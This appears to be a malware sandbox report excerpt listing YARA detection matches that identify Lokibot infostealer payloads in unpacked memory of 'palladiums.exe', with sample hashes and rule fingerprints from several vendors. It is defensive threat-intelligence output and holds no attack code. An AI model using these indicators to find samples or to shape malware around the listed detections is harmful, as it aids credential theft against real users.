Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 34.2.palladiums.exe.18f0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 25.2.palladiums.exe.11b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 23.2.palladiums.exe.1440000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 24.2.palladiums.exe.3a80000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 35.2.palladiums.exe.1340000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 26.2.palladiums.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 11.2.palladiums.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 17.2.palladiums.exe.1830000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.palladiums.exe.14d0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 34.2.palladiums.exe.18f0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.palladiums.exe.37a0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.palladiums.exe.e30000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 28.2.palladiums.exe.31e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 33.2.palladiums.exe.1670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 22.2.palladiums.exe.3830000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 37.2.palladiums.exe.2ee0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 29.2.palladiums.exe.4130000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
